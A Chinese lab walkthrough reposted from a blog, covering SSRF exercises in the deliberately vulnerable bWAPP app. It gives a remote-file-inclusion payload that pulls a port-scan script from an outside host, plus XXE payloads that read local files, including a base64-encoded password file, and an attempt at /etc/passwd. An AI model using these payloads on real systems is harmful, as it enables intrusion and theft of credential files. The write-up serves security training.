利用bWAPP學習SSRF


在這里插入圖片描述
SSRF的3個小實驗

bWAPP中的SSRF給出了3個小實驗來說明SSRF的利用場景:

任務1:使用遠程文件包含進行端口掃描(內網探測)

任務2:使用XXE獲取敏感文件中的內容(文件讀取)

任務3:使用XXE進行SmartTV的拒絕服務漏洞的利用(漏洞利用)

任務1:使用遠程文件包含進行端口掃描
點擊任務1中的Port scan可以獲得一份端口掃描的攻擊腳本:http://192.168.163.157/evil/ssrf-1.txt
接下來就是利用bWAPP中的遠程文件包含漏洞,執行端口掃描的腳本。
在Choose your bug中選擇Remote & Local File Inclusion (RFI/LFI)security level選擇low,然后點擊Hack。
觀察Get請求中的參數,發現是典型文件包含問題,language=lang_en.php
payload:?language=http://xxx.xxx.xxx/evil/ssrf-1.txt&action=go
POST:ip=xxxx
在這里插入圖片描述

任務2:使用XXE獲取敏感文件中的內容
點擊Access獲取XXE的利用腳本:10.158.131.81/bWAPP_latest/evil/ssrf-2.txt
然后切換到XXE漏洞利用環境,點擊Anybugs?,抓包
在這里插入圖片描述
將選中模塊更改為下面的XML代碼:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP_latest/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

使用http協議獲取/bWAPP/robots.txt的內容
在這里插入圖片描述
使用php協議獲取/bWAPP/passwords/heroes.xml中的經過base64編碼的數據

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

在這里插入圖片描述
使用file協議獲取bWAPP本機的/etc/passwd的內容。
在這里插入圖片描述
不知道什么原因。。。

任務3:使用XXE進行SmartTV的拒絕服務漏洞的利用(沒有演示環境)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM